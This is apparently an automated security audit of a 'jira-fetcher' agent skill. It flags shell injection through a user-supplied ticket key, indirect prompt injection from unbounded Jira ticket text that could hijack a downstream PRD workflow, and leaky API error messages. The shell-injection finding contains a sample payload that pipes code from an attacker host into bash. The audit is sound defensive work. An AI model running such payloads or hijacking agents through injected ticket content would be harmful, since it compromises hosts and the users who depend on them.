The Agent Skills Directory

COMMAND_EXECUTION (MEDIUM): The skill instructions in SKILL.md direct the agent to execute python3 scripts/fetch_jira_ticket.py <ticket-key>. Since <ticket-key> is a value provided directly by the user, an attacker could attempt shell injection (e.g., JIRA-123; curl attacker.com/exploit | bash) to execute arbitrary code on the host system.
PROMPT_INJECTION (LOW): The skill is vulnerable to Indirect Prompt Injection (Category 8). It fetches untrusted data (Jira ticket summary and description) and displays it directly to the agent context without boundary markers (e.g., XML tags or delimiters). This data is then used to trigger a secondary 'PRD skill' workflow. Malicious instructions embedded in a Jira ticket could successfully hijack the agent's logic during the PRD planning phase.
Ingestion points: scripts/fetch_jira_ticket.py fetches external ticket data.
Boundary markers: Absent. The data is presented as raw text in Step 2.
Capability inventory: The skill triggers a downstream PRD planning process which involves generating requirements and user stories.
Sanitization: None. The skill explicitly states to 'present this to the user as-is'.
DATA_EXFILTRATION (LOW): The script fetch_jira_ticket.py is configured to return the full body of Atlassian API errors to the user/agent. While Atlassian APIs are generally secure, detailed error responses from external services can occasionally leak internal site configurations, PII, or system paths.

jira-fetcher